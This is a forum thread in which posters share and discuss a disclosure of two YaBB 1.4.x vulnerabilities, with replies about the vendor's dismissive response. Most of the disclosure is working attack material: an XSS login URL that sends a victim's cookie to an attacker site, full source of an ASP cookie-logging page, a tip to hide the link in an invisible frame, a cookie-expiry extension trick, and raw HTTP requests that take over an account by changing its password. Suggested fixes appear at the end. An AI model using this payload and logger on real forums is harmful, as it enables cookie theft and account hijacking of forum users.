The New YaBB Vulnerability!!!!

[STeRoiD]

OK Antionline, As i said earlier about finding security issues, me and my friend found 2 security Issues in YaBB Forums, and here they are (This text we wrote is really fresh on the net) (P.S, voting will help me, thanks) :


Two security vulnerabilities in YaBB allows stealing users cookies and hijacking users accounts.

Tested on:
YaBB 1.4.0 & 1.4.1

Summary :
YaBB is a leading provider of free, downloadable php forums for webmasters. Two security vulnerabilities in the product allows a remote attacker to steal users cookies, hijacking users accounts, and more. The issues discussed are :
1. Cross Site Scripting Vulnerability on the login procedure.
2. Unsecured changing profile method.

*************** 1. Cross Site Scripting Vulnerability on the login procedure ******************

If we log into YaBB forums and enter invalid username/password, the forum displays the username and the password we entered, and it doesn't strip HTML tags from the password field, allowing us to write malicious HTML and JavaScript into the page. From now on, stealing the username cookie is pretty easy. The method for this is creating a css vulnerability in the target site, forcing him to send the cookie to an .asp file we have created. This can be done by this statement :
http://target.com/forums/index.php?board=;action=login2&user=USERNAME&cookielength=120&passwrd=PASSWORD<script>window.location.href(%22http://www.oursite.com/hack.asp?%22%2Bdocument.cookie)</script>

Sending the above url to someone can be suspicious to him but we can build a site which have a invisible frame to that url, which is alot more dangerous.

NOTE : the yabb doesnt allow us to use "=" or "%3d", so we have to catch the cookie without a request("data") statement in the asp file, because then we will need to put "data=" in the url.

Ok, now lets build the hack.asp file, to log the cookie we are posting. The file should look like this :
------------------------------- hack.asp ------------------------------------
<%
Option Explicit

Const ForWriting = 2
Const ForAppending = 8
Const Create = True

Dim MyFile
Dim FSO ' FileSystemObject
Dim TSO ' TextStreamObject
Dim Str
Str = Request.ServerVariables("QUERY_STRING")

MyFile = Server.MapPath("./db/log.txt")

Set FSO = Server.CreateObject("Scripting.FileSystemObject")
Set TSO = FSO.OpenTextFile(MyFile, ForAppending, Create)

if (Str <> "") then TSO.WriteLine Str

TSO.close
Set TSO = Nothing
Set FSO = Nothing
%>
<HTML>
<BODY>
You have just been hacked.
</BODY>
</HTML>
----------------------------------- EOF -----------------------------------

This file writes Request.ServerVariables("QUERY_STRING"), which is the whole path we are posting after the "?", into a log file.


************* 2. Unsecured changing profile method ***************

YaBB has a form to change users details. the original password is not required when changing the password to a new one, meaning that if an attacker have someone else cookie, he can change his password.

- Defines:
USERNAME - The username
USERNAME COOKIE- The username cookie.

- YaBB Cookie Explanation :
The cookie's format of YaBB is something like :
Cookie: YaBBusername=<USERNAME>; YaBBpassword=ys6bPWmp44PXA;
expiretime=1034304354
After the attacker got the cookie, he can use the cookie to change the user password. He can use the cookie even if the expiretime has passed by changing the cookie to the following :
Cookie: YaBBusername=<USERNAME; YaBBpassword=ys6bPWmp44PXA;
expiretime=9999999999

This one will always work.

- Exploiting the server and changing to a new password :
First of all, if the attacker only want to change the password and not the user details, he will have to get them from the server database and only then he will build his POST request that will change the user's password. to do that, he also have to include the stolen cookie.

to find out the user details, he will send this request to the server :

------------------------------------
GET /forums/index.php?board=;action=profile;user=<USERNAME> HTTP/1.0
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg,
application/vnd.ms-powerpoint, application/vnd.ms-excel,
application/msword,
*/*
Accept-Language: en-us
Cookie: <USERNAME COOKIE>
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
Host: www.victim.com
Proxy-Connection: Keep-Alive
------------------------------------

Then the server will return a form with the <USERNAME> details, and allow attacker to change it. Note that the form doesn't ask the user to enter his previous password, and it doesn't check anything but the username and his cookie to see if it is the legitimate user. Now attacker is ready to build his main POST request to change the user's password

The POST request might look like this :

------------------------------------
POST /forums/index.php?board=;action=profile2 HTTP/1.1
Accept: application/vnd.ms-powerpoint, application/vnd.ms-excel,
application/msword, image/gif, image/x-xbitmap, image/jpeg,
image/pjpeg, */*
Accept-Language: en-us
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0;
TUCOWS;
YComp 5.0.0.0)
Host: www.victim.com
Content-Length: 286
Proxy-Connection: Keep-Alive
Pragma: no-cache
Cookie: <USERNAME COOKIE>

userID=666&user=<USERNAME>&passwrd1=HaCkEd&passwrd2=HaCkEd&name=<USERNAME>&e
[email protected]&gender=&bday1=00&bday2=00&bday3=0000&location=&websi
tetitle=&websiteurl=&icq=3&aim=&msn=&yim=&usertext=&hideemail=on&usertimefor
mat=&usertimeoffset=0&signature=&secretQuestion=&secretAnswer=&moda=1
------------------------------------

All the details that the attacker set are values taken from the form he got when he sent the GET request first (note that userID is a hidden value).
You can see the "passwrd1" and "passwrd2" parameters that attacker send to the server.
After sending the above POST request, the user's password will be changed to "HaCkEd".

*************************************************************************

- Possible Solution:
For the CSS Problem : Dont show the invalid username/password, or at least strip HTML tags from the password field

For the password changing problem :
1. YaBB can save the IP of each user, and check the IP when someone asks to change his password. (Still not unbreakable, but much harder to exploit).
2. YaBB can ask the user to enter also the previous password before changing it to new one. In that way the attacker won't be able to break the forum protection by having only the user's cookie.

-
The security vulnerabilities were found by:

Assaf Reshef
Email: [email protected]

Nir Adar
Email: [email protected]
Web: http://underwar.livedns.co.il

*************************************************************************

Vendor status :
10.10 First contact with the vendor, about the first security issue.
11.10-16.10 Talking with the vendor. Vendor didnt take this seriously
18.10 Second contact about the second security issue
18.10 Vendor didnt take this issue seriously either

[David Skism]

Excellent thread STeRoiD good finding.

[linuxelite]

Nice find. Just wondering about a couple of things.
1. Why did you use asp? Something special? Or just a language you know?
2. What did YaBB say to you exactly? Did they just refuse to acknowledge the problem or what? Seems like a big problem, anybody with win9x or xp pro, 2k, and nt could run asp pages. I dunno about xp home.
3. Do you guys have a background in security or something? Or were you just very bored? I've been studying phph portals, and found a few problems, but nothing as complicated as this.

[underwar]

Answers:

> 1. Why did you use asp? Something special? Or just a language you know?

Just language we know...

>2. What did YaBB say to you exactly? Did they just refuse to acknowledge the problem or
> what? Seems like a big problem, anybody with win9x or xp pro, 2k, and nt could run asp
> pages. I dunno about xp home.

examples to some of the YaBB's replies:

------------------------------------------------------------------------------------------
Well we're looking into it but we're not so sure what we're going to do
with it. Basically this issue equates to: If someone steals my key for my
house, it means there is a security hole. And really that ISN'T a security
hole.
------------------------------------------------------------------------------------------
If you guys can grab control of my user account on the main forums,
I'll take this seriously. Take control of my account (username is *****) and
post a message in the admin area, I will take a hard look at these...
The developers weren't at all convinced that the first thing was a
security hole and I'm not so sure this next one is either.
------------------------------------------------------------------------------------------


> 3. Do you guys have a background in security or something? Or were you just very bored?
> I've been studying phph portals, and found a few problems, but nothing as complicated as
> this.

We are programmers. Founding the bugs was easy - anyone can see that they don't ask for the previous password before changing it to new one. Also - it is easy to find the Css bug.
simply type something like "whatever" in every text input you find, and test if it strips the tag or not.
Exploiting the bugs - it is programming.


Nir

[linuxelite]

If you guys can grab control of my user account on the main forums,
I'll take this seriously. Take control of my account (username is *****) and
post a message in the admin area, I will take a hard look at these...

That's foolish, lots of people can be socially engineered. To ignore the situation, well, it shows they aren't all that comitted to the security of their product. They shouldn't hope that every user who uses YaBB knows better. Ignoring a flaw only proves that YaBB isn't the way to go if you're looking for a forum.
Anyways, thanks for the post.

[KissCool]

Good thread STeRoiD. One of my friends use Yabb on his site. He will become mad to have to change one of its components again (the last month it was the web server which was cracked).